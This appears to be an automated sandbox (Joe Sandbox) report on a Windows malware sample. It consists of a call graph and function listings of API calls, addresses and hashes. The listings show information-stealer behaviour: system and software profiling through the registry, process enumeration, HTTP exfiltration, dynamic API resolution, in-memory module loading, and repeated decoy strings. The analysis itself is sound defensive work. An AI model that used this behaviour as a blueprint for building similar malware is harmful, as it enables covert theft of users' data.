15278 b12228 15277->15278 15279 b1a9b0 4 API calls 15278->15279 15280 b12247 15279->15280 15281 b1a8a0 lstrcpy 15280->15281 15282 b12250 15281->15282 15283 b1a9b0 4 API calls 15282->15283 15284 b12270 15283->15284 15285 b1a8a0 lstrcpy 15284->15285 15286 b12279 15285->15286 15867 b18100 GetProcessHeap RtlAllocateHeap 15286->15867 15289 b1a9b0 4 API calls 15290 b12299 15289->15290 15291 b1a8a0 lstrcpy 15290->15291 15292 b122a2 15291->15292 15293 b1a9b0 4 API calls 15292->15293 15294 b122c1 15293->15294 15295 b1a8a0 lstrcpy 15294->15295 15296 b122ca 15295->15296 15297 b1a9b0 4 API calls 15296->15297 15298 b122eb 15297->15298 15299 b1a8a0 lstrcpy 15298->15299 15300 b122f4 15299->15300 15873 b187c0 15300->15873 15303 b1a920 3 API calls 15304 b1231e 15303->15304 15305 b1a8a0 lstrcpy 15304->15305 15306 b12327 15305->15306 15307 b1a9b0 4 API calls 15306->15307 15308 b12351 15307->15308 15309 b1a8a0 lstrcpy 15308->15309 15310 b1235a 15309->15310 15311 b1a9b0 4 API calls 15310->15311 15312 b1237a 15311->15312 15313 b1a8a0 lstrcpy 15312->15313 15314 b12383 15313->15314 15315 b1a9b0 4 API calls 15314->15315 15316 b123a2 15315->15316 15317 b1a8a0 lstrcpy 15316->15317 15318 b123ab 15317->15318 15878 b181f0 15318->15878 15320 b123c2 15321 b1a920 3 API calls 15320->15321 15322 b123d5 15321->15322 15323 b1a8a0 lstrcpy 15322->15323 15324 b123de 15323->15324 15325 b1a9b0 4 API calls 15324->15325 15326 b1240a 15325->15326 15327 b1a8a0 lstrcpy 15326->15327 15328 b12413 15327->15328 15329 b1a9b0 4 API calls 15328->15329 15330 b12432 15329->15330 15331 b1a8a0 lstrcpy 15330->15331 15332 b1243b 15331->15332 15333 b1a9b0 4 API calls 15332->15333 15334 b1245c 15333->15334 15335 b1a8a0 lstrcpy 15334->15335 15336 b12465 15335->15336 15337 b1a9b0 4 API calls 15336->15337 15338 b12484 15337->15338 15339 b1a8a0 lstrcpy 15338->15339 15340 b1248d 15339->15340 15341 b1a9b0 4 API calls 15340->15341 15342 b124ae 15341->15342 15343 b1a8a0 lstrcpy 15342->15343 15344 b124b7 15343->15344 15886 b18320 15344->15886 15346 b124d3 15347 b1a920 3 API calls 15346->15347 15348 b124e6 15347->15348 15349 b1a8a0 lstrcpy 15348->15349 15350 b124ef 15349->15350 15351 b1a9b0 4 API calls 15350->15351 15352 b12519 15351->15352 15353 b1a8a0 lstrcpy 15352->15353 15354 b12522 15353->15354 15355 b1a9b0 4 API calls 15354->15355 15356 b12543 15355->15356 15357 b1a8a0 lstrcpy 15356->15357 15358 b1254c 15357->15358 15359 b18320 17 API calls 15358->15359 15360 b12568 15359->15360 15361 b1a920 3 API calls 15360->15361 15362 b1257b 15361->15362 15363 b1a8a0 lstrcpy 15362->15363 15364 b12584 15363->15364 15365 b1a9b0 4 API calls 15364->15365 15366 b125ae 15365->15366 15367 b1a8a0 lstrcpy 15366->15367 15368 b125b7 15367->15368 15369 b1a9b0 4 API calls 15368->15369 15370 b125d6 15369->15370 15371 b1a8a0 lstrcpy 15370->15371 15372 b125df 15371->15372 15373 b1a9b0 4 API calls 15372->15373 15374 b12600 15373->15374 15375 b1a8a0 lstrcpy 15374->15375 15376 b12609 15375->15376 15922 b18680 15376->15922 15378 b12620 15379 b1a920 3 API calls 15378->15379 15380 b12633 15379->15380 15381 b1a8a0 lstrcpy 15380->15381 15382 b1263c 15381->15382 15383 b1265a lstrlen 15382->15383 15384 b1266a 15383->15384 15385 b1a740 lstrcpy 15384->15385 15386 b1267c 15385->15386 15387 b01590 lstrcpy 15386->15387 15388 b1268d 15387->15388 15932 b15190 15388->15932 15390 b12699 15390->13822 16120 b1aad0 15391->16120 15393 b05009 InternetOpenUrlA 15397 b05021 15393->15397 15394 b050a0 InternetCloseHandle InternetCloseHandle 15396 b050ec 15394->15396 15395 b0502a InternetReadFile 15395->15397 15396->13826 15397->15394 15397->15395 16121 b098d0 15398->16121 15400 b10759 15401 b10a38 15400->15401 15402 b1077d 15400->15402 15403 b01590 lstrcpy 15401->15403 15404 b10799 StrCmpCA 15402->15404 15405 b10a49 15403->15405 15406 b107a8 15404->15406 15410 b10843 15404->15410 16297 b10250 15405->16297 15408 b1a7a0 lstrcpy 15406->15408 15411 b107c3 15408->15411 15412 b10865 StrCmpCA 15410->15412 15414 b01590 lstrcpy 15411->15414 15413 b10874 15412->15413 15450 b1096b 15412->15450 15415 b1a740 lstrcpy 15413->15415 15416 b1080c 15414->15416 15418 b10881 15415->15418 15419 b1a7a0 lstrcpy 15416->15419 15417 b1099c StrCmpCA 15420 b10a2d 15417->15420 15421 b109ab 15417->15421 15422 b1a9b0 4 API calls 15418->15422 15423 b10823 15419->15423 15420->13830 15424 b01590 lstrcpy 15421->15424 15425 b108ac 15422->15425 15426 b1a7a0 lstrcpy 15423->15426 15427 b109f4 15424->15427 15428 b1a920 3 API calls 15425->15428 15429 b1083e 15426->15429 15430 b1a7a0 lstrcpy 15427->15430 15431 b108b3 15428->15431 16124 b0fb00 15429->16124 15433 b10a0d 15430->15433 15434 b1a9b0 4 API calls 15431->15434 15435 b1a7a0 lstrcpy 15433->15435 15436 b108ba 15434->15436 15437 b10a28 15435->15437 15450->15417 15772 b1a7a0 lstrcpy 15771->15772 15773 b01683 15772->15773 15774 b1a7a0 lstrcpy 15773->15774 15775 b01695 15774->15775 15776 b1a7a0 lstrcpy 15775->15776 15777 b016a7 15776->15777 15778 b1a7a0 lstrcpy 15777->15778 15779 b015a3 15778->15779 15779->14653 15781 b047c6 15780->15781 15782 b04838 lstrlen 15781->15782 15806 b1aad0 15782->15806 15784 b04848 InternetCrackUrlA 15785 b04867 15784->15785 15785->14730 15787 b1a740 lstrcpy 15786->15787 15788 b18b74 15787->15788 15789 b1a740 lstrcpy 15788->15789 15790 b18b82 GetSystemTime 15789->15790 15792 b18b99 15790->15792 15791 b1a7a0 lstrcpy 15793 b18bfc 15791->15793 15792->15791 15793->14745 15795 b1a931 15794->15795 15796 b1a988 15795->15796 15798 b1a968 lstrcpy lstrcat 15795->15798 15797 b1a7a0 lstrcpy 15796->15797 15799 b1a994 15797->15799 15798->15796 15799->14748 15800->14863 15802 b09af9 LocalAlloc 15801->15802 15803 b04eee 15801->15803 15802->15803 15804 b09b14 CryptStringToBinaryA 15802->15804 15803->14751 15803->14753 15804->15803 15805 b09b39 LocalFree 15804->15805 15805->15803 15806->15784 15807->14873 15808->15014 15809->15016 15810->15024 15939 b177a0 15811->15939 15814 b176c6 RegOpenKeyExA 15816 b17704 RegCloseKey 15814->15816 15817 b176e7 RegQueryValueExA 15814->15817 15815 b11c1e 15815->15106 15816->15815 15817->15816 15819 b11c99 15818->15819 15819->15120 15821 b11e09 15820->15821 15821->15162 15823 b11e84 15822->15823 15824 b17a9a wsprintfA 15822->15824 15823->15176 15824->15823 15826 b11efe 15825->15826 15827 b17b4d 15825->15827 15826->15190 15946 b18d20 LocalAlloc CharToOemW 15827->15946 15830 b1a740 lstrcpy 15829->15830 15831 b17bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15830->15831 15840 b17c25 15831->15840 15832 b17c46 GetLocaleInfoA 15832->15840 15833 b17d18 15834 b17d28 15833->15834 15835 b17d1e LocalFree 15833->15835 15836 b1a7a0 lstrcpy 15834->15836 15835->15834 15839 b17d37 15836->15839 15837 b1a9b0 lstrcpy lstrlen lstrcpy lstrcat 15837->15840 15838 b1a8a0 lstrcpy 15838->15840 15839->15203 15840->15832 15840->15833 15840->15837 15840->15838 15842 b12008 15841->15842 15842->15218 15844 b19493 GetModuleFileNameExA CloseHandle 15843->15844 15845 b194b5 15843->15845 15844->15845 15846 b1a740 lstrcpy 15845->15846 15847 b12091 15846->15847 15847->15233 15849 b12119 15848->15849 15850 b17e68 RegQueryValueExA 15848->15850 15849->15247 15851 b17e8e RegCloseKey 15850->15851 15851->15849 15853 b17fb9 GetLogicalProcessorInformationEx 15852->15853 15854 b18029 15853->15854 15855 b17fd8 GetLastError 15853->15855 15861 b189f0 2 API calls 15854->15861 15858 b18022 15855->15858 15864 b17fe3 15855->15864 15859 b12194 15858->15859 15860 b189f0 2 API calls 15858->15860 15859->15261 15860->15859 15862 b1807b 15861->15862 15862->15858 15863 b18084 wsprintfA 15862->15863 15863->15859 15864->15853 15864->15859 15947 b189f0 15864->15947 15950 b18a10 GetProcessHeap RtlAllocateHeap 15864->15950 15866 b1220f 15865->15866 15866->15275 15868 b189b0 15867->15868 15869 b1814d GlobalMemoryStatusEx 15868->15869 15872 b18163 __aulldiv 15869->15872 15870 b1819b wsprintfA 15871 b12289 15870->15871 15871->15289 15872->15870 15874 b187fb GetProcessHeap RtlAllocateHeap wsprintfA 15873->15874 15876 b1a740 lstrcpy 15874->15876 15877 b1230b 15876->15877 15877->15303 15879 b1a740 lstrcpy 15878->15879 15881 b18229 15879->15881 15880 b18263 15882 b1a7a0 lstrcpy 15880->15882 15881->15880 15884 b1a9b0 lstrcpy lstrlen lstrcpy lstrcat 15881->15884 15885 b1a8a0 lstrcpy 15881->15885 15883 b182dc 15882->15883 15883->15320 15884->15881 15885->15881 15887 b1a740 lstrcpy 15886->15887 15888 b1835c RegOpenKeyExA 15887->15888 15889 b183d0 15888->15889 15890 b183ae 15888->15890 15892 b18613 RegCloseKey 15889->15892 15893 b183f8 RegEnumKeyExA 15889->15893 15891 b1a7a0 lstrcpy 15890->15891 15902 b183bd 15891->15902 15894 b1a7a0 lstrcpy 15892->15894 15895 b1843f wsprintfA RegOpenKeyExA 15893->15895 15896 b1860e 15893->15896 15894->15902 15897 b184c1 RegQueryValueExA 15895->15897 15898 b18485 RegCloseKey RegCloseKey 15895->15898 15896->15892 15900 b18601 RegCloseKey 15897->15900 15901 b184fa lstrlen 15897->15901 15899 b1a7a0 lstrcpy 15898->15899 15899->15902 15900->15896 15901->15900 15903 b18510 15901->15903 15902->15346 15904 b1a9b0 4 API calls 15903->15904 15905 b18527 15904->15905 15906 b1a8a0 lstrcpy 15905->15906 15907 b18533 15906->15907 15908 b1a9b0 4 API calls 15907->15908 15909 b18557 15908->15909 15910 b1a8a0 lstrcpy 15909->15910 15911 b18563 15910->15911 15912 b1856e RegQueryValueExA 15911->15912 15912->15900 15913 b185a3 15912->15913 15914 b1a9b0 4 API calls 15913->15914 15915 b185ba 15914->15915 15916 b1a8a0 lstrcpy 15915->15916 15917 b185c6 15916->15917 15918 b1a9b0 4 API calls 15917->15918 15919 b185ea 15918->15919 15920 b1a8a0 lstrcpy 15919->15920 15921 b185f6 15920->15921 15921->15900 15923 b1a740 lstrcpy 15922->15923 15924 b186bc CreateToolhelp32Snapshot Process32First 15923->15924 15925 b186e8 Process32Next 15924->15925 15926 b1875d CloseHandle 15924->15926 15925->15926 15930 b186fd 15925->15930 15927 b1a7a0 lstrcpy 15926->15927 15929 b18776 15927->15929 15928 b1a9b0 lstrcpy lstrlen lstrcpy lstrcat 15928->15930 15929->15378 15930->15925 15930->15928 15931 b1a8a0 lstrcpy 15930->15931 15931->15930 15933 b1a7a0 lstrcpy 15932->15933 15934 b151b5 15933->15934 15935 b01590 lstrcpy 15934->15935 15936 b151c6 15935->15936 15951 b05100 15936->15951 15938 b151cf 15938->15390 15942 b17720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15939->15942 15941 b176b9 15941->15814 15941->15815 15943 b17780 RegCloseKey 15942->15943 15944 b17765 RegQueryValueExA 15942->15944 15945 b17793 15943->15945 15944->15943 15945->15941 15946->15826 15948 b189f9 GetProcessHeap HeapFree 15947->15948 15949 b18a0c 15947->15949 15948->15949 15949->15864 15950->15864 15952 b1a7a0 lstrcpy 15951->15952 15953 b05119 15952->15953 15954 b047b0 2 API calls 15953->15954 15955 b05125 15954->15955 16111 b18ea0 15955->16111 15957 b05184 15958 b05192 lstrlen 15957->15958 15959 b051a5 15958->15959 15960 b18ea0 4 API calls 15959->15960 15961 b051b6 15960->15961 15962 b1a740 lstrcpy 15961->15962 15963 b051c9 15962->15963 15964 b1a740 lstrcpy 15963->15964 15965 b051d6 15964->15965 15966 b1a740 lstrcpy 15965->15966 15967 b051e3 15966->15967 15968 b1a740 lstrcpy 15967->15968 15969 b051f0 15968->15969 15970 b1a740 lstrcpy 15969->15970 15971 b051fd InternetOpenA StrCmpCA 15970->15971 15972 b0522f 15971->15972 15973 b058c4 InternetCloseHandle 15972->15973 15974 b18b60 3 API calls 15972->15974 15981 b058d9 ctype 15973->15981 15975 b0524e 15974->15975 15976 b1a920 3 API calls 15975->15976 15977 b05261 15976->15977 15978 b1a8a0 lstrcpy 15977->15978 15979 b0526a 15978->15979 15980 b1a9b0 4 API calls 15979->15980 15982 b052ab 15980->15982 15984 b1a7a0 lstrcpy 15981->15984 15983 b1a920 3 API calls 15982->15983 15985 b052b2 15983->15985 15992 b05913 15984->15992 15986 b1a9b0 4 API calls 15985->15986 15987 b052b9 15986->15987 15988 b1a8a0 lstrcpy 15987->15988 15989 b052c2 15988->15989 15990 b1a9b0 4 API calls 15989->15990 15991 b05303 15990->15991 15993 b1a920 3 API calls 15991->15993 15992->15938 15994 b0530a 15993->15994 15995 b1a8a0 lstrcpy 15994->15995 15996 b05313 15995->15996 15997 b05329 InternetConnectA 15996->15997 15997->15973 15998 b05359 HttpOpenRequestA 15997->15998 16000 b058b7 InternetCloseHandle 15998->16000 16001 b053b7 15998->16001 16000->15973 16002 b1a9b0 4 API calls 16001->16002 16003 b053cb 16002->16003 16004 b1a8a0 lstrcpy 16003->16004 16005 b053d4 16004->16005 16006 b1a920 3 API calls 16005->16006 16007 b053f2 16006->16007 16008 b1a8a0 lstrcpy 16007->16008 16009 b053fb 16008->16009 16010 b1a9b0 4 API calls 16009->16010 16011 b0541a 16010->16011 16012 b1a8a0 lstrcpy 16011->16012 16013 b05423 16012->16013 16014 b1a9b0 4 API calls 16013->16014 16015 b05444 16014->16015 16016 b1a8a0 lstrcpy 16015->16016 16017 b0544d 16016->16017 16018 b1a9b0 4 API calls 16017->16018 16019 b0546e 16018->16019 16020 b1a8a0 lstrcpy 16019->16020 16112 b18ea9 16111->16112 16113 b18ead CryptBinaryToStringA 16111->16113 16112->15957 16113->16112 16114 b18ece GetProcessHeap RtlAllocateHeap 16113->16114 16114->16112 16115 b18ef4 ctype 16114->16115 16116 b18f05 CryptBinaryToStringA 16115->16116 16116->16112 16120->15393 16363 b09880 16121->16363 16123 b098e1 16123->15400 16125 b1a740 lstrcpy 16124->16125 16298 b1a740 lstrcpy 16297->16298 16299 b10266 16298->16299 16300 b18de0 2 API calls 16299->16300 16301 b1027b 16300->16301 16302 b1a920 3 API calls 16301->16302 16303 b1028b 16302->16303 16304 b1a8a0 lstrcpy 16303->16304 16305 b10294 16304->16305 16306 b1a9b0 4 API calls 16305->16306 16307 b102b8 16306->16307 16364 b0988e 16363->16364 16367 b06fb0 16364->16367 16366 b098ad ctype 16366->16123 16370 b06d40 16367->16370 16371 b06d63 16370->16371 16381 b06d59 16370->16381 16386 b06530 16371->16386 16375 b06dbe 16375->16381 16396 b069b0 16375->16396 16377 b06e2a 16378 b06ee6 VirtualFree 16377->16378 16380 b06ef7 16377->16380 16377->16381 16378->16380 16379 b06f41 16379->16381 16382 b189f0 2 API calls 16379->16382 16380->16379 16383 b06f26 FreeLibrary 16380->16383 16384 b06f38 16380->16384 16381->16366 16382->16381 16383->16380 16385 b189f0 2 API calls 16384->16385 16385->16379 16387 b06542 16386->16387 16389 b06549 16387->16389 16406 b18a10 GetProcessHeap RtlAllocateHeap 16387->16406 16389->16381 16390 b06660 16389->16390 16393 b0668f VirtualAlloc 16390->16393 16392 b06730 16394 b06743 VirtualAlloc 16392->16394 16395 b0673c 16392->16395 16393->16392 16393->16395 16394->16395 16395->16375 16397 b069c9 16396->16397 16401 b069d5 16396->16401 16398 b06a09 LoadLibraryA 16397->16398 16397->16401 16399 b06a32 16398->16399 16398->16401 16403 b06ae0 16399->16403 16407 b18a10 GetProcessHeap RtlAllocateHeap 16399->16407 16401->16377 16402 b06ba8 GetProcAddress 16402->16401 16402->16403 16403->16401 16403->16402 16404 b189f0 2 API calls 16404->16403 16405 b06a8b 16405->16401 16405->16404 16406->16389 16407->16405

                  Executed Functions

                  Function 00B19860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 660 b19860-b19874 call b19750 663 b19a93-b19af2 LoadLibraryA * 5 660->663 664 b1987a-b19a8e call b19780 GetProcAddress * 21 660->664 666 b19af4-b19b08 GetProcAddress 663->666 667 b19b0d-b19b14 663->667 664->663 666->667 669 b19b46-b19b4d 667->669 670 b19b16-b19b41 GetProcAddress * 2 667->670 671 b19b68-b19b6f 669->671 672 b19b4f-b19b63 GetProcAddress 669->672 670->669 673 b19b71-b19b84 GetProcAddress 671->673 674 b19b89-b19b90 671->674 672->671 673->674 675 b19bc1-b19bc2 674->675 676 b19b92-b19bbc GetProcAddress * 2 674->676 676->675
                  APIs
                  • GetProcAddress.KERNEL32(75900000,011F06C0), ref: 00B198A1
                  • GetProcAddress.KERNEL32(75900000,011F0708), ref: 00B198BA
                  • GetProcAddress.KERNEL32(75900000,011F0720), ref: 00B198D2
                  • GetProcAddress.KERNEL32(75900000,011F07F8), ref: 00B198EA
                  • GetProcAddress.KERNEL32(75900000,011F0558), ref: 00B19903
                  • GetProcAddress.KERNEL32(75900000,011F8950), ref: 00B1991B
                  • GetProcAddress.KERNEL32(75900000,011E6580), ref: 00B19933
                  • GetProcAddress.KERNEL32(75900000,011E65A0), ref: 00B1994C
                  • GetProcAddress.KERNEL32(75900000,011F0570), ref: 00B19964
                  • GetProcAddress.KERNEL32(75900000,011F0588), ref: 00B1997C
                  • GetProcAddress.KERNEL32(75900000,011F05A0), ref: 00B19995
                  • GetProcAddress.KERNEL32(75900000,011F05B8), ref: 00B199AD
                  • GetProcAddress.KERNEL32(75900000,011E6500), ref: 00B199C5
                  • GetProcAddress.KERNEL32(75900000,011F05D0), ref: 00B199DE
                  • GetProcAddress.KERNEL32(75900000,011F0618), ref: 00B199F6
                  • GetProcAddress.KERNEL32(75900000,011E62A0), ref: 00B19A0E
                  • GetProcAddress.KERNEL32(75900000,011F0648), ref: 00B19A27
                  • GetProcAddress.KERNEL32(75900000,011F08E8), ref: 00B19A3F
                  • GetProcAddress.KERNEL32(75900000,011E6640), ref: 00B19A57
                  • GetProcAddress.KERNEL32(75900000,011F0918), ref: 00B19A70
                  • GetProcAddress.KERNEL32(75900000,011E63C0), ref: 00B19A88
                  • LoadLibraryA.KERNEL32(011F08A0,?,00B16A00), ref: 00B19A9A
                  • LoadLibraryA.KERNEL32(011F0900,?,00B16A00), ref: 00B19AAB
                  • LoadLibraryA.KERNEL32(011F08D0,?,00B16A00), ref: 00B19ABD
                  • LoadLibraryA.KERNEL32(011F0858,?,00B16A00), ref: 00B19ACF
                  • LoadLibraryA.KERNEL32(011F0870,?,00B16A00), ref: 00B19AE0
                  • GetProcAddress.KERNEL32(75070000,011F08B8), ref: 00B19B02
                  • GetProcAddress.KERNEL32(75FD0000,011F0888), ref: 00B19B23
                  • GetProcAddress.KERNEL32(75FD0000,011F8F40), ref: 00B19B3B
                  • GetProcAddress.KERNEL32(75A50000,011F8EF8), ref: 00B19B5D
                  • GetProcAddress.KERNEL32(74E50000,011E6420), ref: 00B19B7E
                  • GetProcAddress.KERNEL32(76E80000,011F8900), ref: 00B19B9F
                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00B19BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 00B19BAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: 12a9981547a7f80e5f6666add7eb6e99a53ea6e03ac873c1eb85af8086b3bcb6
                  • Instruction ID: af4a29b2f3b86f6fb59ddd64369392a37438fefe44736da40725e0db3a90e798
                  • Opcode Fuzzy Hash: 12a9981547a7f80e5f6666add7eb6e99a53ea6e03ac873c1eb85af8086b3bcb6
                  • Instruction Fuzzy Hash: 7CA12ABE5C43409FE364EFACED88A663BF9F74E301714451AA609C3364D639A841DB72
                  Function 00B045C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 764 b045c0-b04695 RtlAllocateHeap 781 b046a0-b046a6 764->781 782 b046ac-b0474a 781->782 783 b0474f-b047a9 VirtualProtect 781->783 782->781
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B0460F
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00B0479C
                  Strings
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B0462D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B046CD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B04713
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B04678
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B04729
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B04657
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B0474F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B04683
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B04643
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B045DD
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B0475A
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B0473F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B04734
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B04622
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B04662
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B045D2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B046AC
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B045E8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B045F3
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B0471E
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B0477B
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B04617
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B04638
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B046B7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B045C7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B046C2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B0466D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B046D8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B04770
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B04765
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
